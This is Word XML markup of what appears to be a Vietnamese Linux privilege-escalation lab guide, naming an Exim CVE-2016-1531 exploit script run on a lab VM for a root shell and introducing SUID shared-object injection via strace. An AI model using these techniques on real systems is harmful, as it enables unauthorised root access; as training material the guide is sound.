          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>có</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sẵn.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>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bản sao</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>có</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thể</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>được</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tìm</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thấy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trên</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>máy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ảo</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debian</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tại</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/home/user/tools/suid/exim/cve-2016-1531.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C8BC3" w14:textId="23EC27B7" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="84" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chạy tập lệnh khai thác để lấy root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A7223" w14:textId="60A1258B" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="00052672" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="7" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="212A3EA8" wp14:editId="5A552FB6">
            <wp:extent cx="5867400" cy="42710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4271010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25196855"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5AC44085"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lastRenderedPageBreak/>
        <w:t>SUID / SGID Executables - Shared Object Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EC1EA3" w14:textId="2629BC01" w:rsidR="002D4A21" w:rsidRPr="00052672" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="118" w:after="0" w:line="429" w:lineRule="auto"/>
        <w:ind w:right="1735"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E601168" w14:textId="1954BC73" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0688937C" w14:textId="6BCA0BA2" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6213"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="99"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114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06024FDA" wp14:editId="11143A61">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4220210</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>63500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="576580" cy="134620"/>
                <wp:effectExtent l="635" t="0" r="381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34620"/>
                          <a:chOff x="6646" y="100"/>
                          <a:chExt cx="908" cy="212"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="147" name="Freeform 129"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6645" y="135"/>
                            <a:ext cx="908" cy="176"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7526 6646"/>
                              <a:gd name="T1" fmla="*/ T0 w 908"/>
                              <a:gd name="T2" fmla="+- 0 311 136"/>
                              <a:gd name="T3" fmla="*/ 311 h 176"/>
                              <a:gd name="T4" fmla="+- 0 6673 6646"/>
                              <a:gd name="T5" fmla="*/ T4 w 908"/>
                              <a:gd name="T6" fmla="+- 0 311 136"/>
                              <a:gd name="T7" fmla="*/ 311 h 176"/>
                              <a:gd name="T8" fmla="+- 0 6669 6646"/>
                              <a:gd name="T9" fmla="*/ T8 w 908"/>
                              <a:gd name="T10" fmla="+- 0 310 136"/>
                              <a:gd name="T11" fmla="*/ 310 h 176"/>
                              <a:gd name="T12" fmla="+- 0 6646 6646"/>
                              <a:gd name="T13" fmla="*/ T12 w 908"/>
                              <a:gd name="T14" fmla="+- 0 284 136"/>
                              <a:gd name="T15" fmla="*/ 284 h 176"/>
                              <a:gd name="T16" fmla="+- 0 6646 6646"/>
                              <a:gd name="T17" fmla="*/ T16 w 908"/>
                              <a:gd name="T18" fmla="+- 0 162 136"/>
                              <a:gd name="T19" fmla="*/ 162 h 176"/>
                              <a:gd name="T20" fmla="+- 0 6673 6646"/>
                              <a:gd name="T21" fmla="*/ T20 w 908"/>
                              <a:gd name="T22" fmla="+- 0 136 136"/>
                              <a:gd name="T23" fmla="*/ 136 h 176"/>
                              <a:gd name="T24" fmla="+- 0 7526 6646"/>
                              <a:gd name="T25" fmla="*/ T24 w 908"/>
                              <a:gd name="T26" fmla="+- 0 136 136"/>
                              <a:gd name="T27" fmla="*/ 136 h 176"/>
                              <a:gd name="T28" fmla="+- 0 7553 6646"/>
                              <a:gd name="T29" fmla="*/ T28 w 908"/>
                              <a:gd name="T30" fmla="+- 0 162 136"/>
                              <a:gd name="T31" fmla="*/ 162 h 176"/>
                              <a:gd name="T32" fmla="+- 0 7553 6646"/>
                              <a:gd name="T33" fmla="*/ T32 w 908"/>
                              <a:gd name="T34" fmla="+- 0 284 136"/>
                              <a:gd name="T35" fmla="*/ 284 h 176"/>
                              <a:gd name="T36" fmla="+- 0 7530 6646"/>
                              <a:gd name="T37" fmla="*/ T36 w 908"/>
                              <a:gd name="T38" fmla="+- 0 310 136"/>
                              <a:gd name="T39" fmla="*/ 31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176">
                                <a:moveTo>
                                  <a:pt x="880" y="175"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="27" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23" y="174"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="26"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="880" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="907" y="26"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="907" y="148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="884" y="17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130"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6645" y="99"/>
                            <a:ext cx="90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A7AB" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="57"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="11"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="11"/>
                                </w:rPr>
                                <w:t>no such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4FDA" id="Group 146" o:spid="_x0000_s1038" style="position:absolute;margin-left:332.3pt;margin-top:5pt;width:45.4pt;height:10.6pt;z-index:-251639808;mso-position-horizontal-relative:page" coordorigin="6646,100" coordsize="90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">
                <v:shape id="Freeform 129" o:spid="_x0000_s1039" style="position:absolute;left:6645;top:135;width:908;height:176;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9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" path="m880,175r-853,l23,174,,148,,26,27,,880,r27,26l907,148r-23,26l880,175xe" fillcolor="#868278" stroked="f">
                  <v:fill opacity="9766f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="880,311;27,311;23,310;0,284;0,162;27,136;880,136;907,162;907,284;884,310" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 130" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:6645;top:99;width:90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818A7AB" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="57"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="11"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="11"/>
                          </w:rPr>
                          <w:t>no such file</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strace</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trên</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tệp</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5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tìm</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kiếm</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đầu</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ra</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cho</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>open</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5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>truy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cập</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5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lỗi</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NO SUCH FILE</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408EA136" w14:textId="53AF67DF" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="00052672" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="8" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B30AF68" wp14:editId="501045DF">
            <wp:extent cx="5867400" cy="28822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2882265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB720E" w14:textId="54AB33C6" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="00052672" w:rsidP="00052672">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="130" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251654144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="15DAEC96" wp14:editId="1B55636A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>68580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="628650" cy="234950"/>
                <wp:effectExtent l="0" t="0" r="0" b="127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234950"/>
                          <a:chOff x="1440" y="-342"/>
                          <a:chExt cx="990" cy="370"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="141" name="Freeform 103"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="-148"/>
                            <a:ext cx="557" cy="176"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 1970 1440"/>
                              <a:gd name="T1" fmla="*/ T0 w 557"/>
                              <a:gd name="T2" fmla="+- 0 28 -147"/>
                              <a:gd name="T3" fmla="*/ 28 h 176"/>
                              <a:gd name="T4" fmla="+- 0 1467 1440"/>
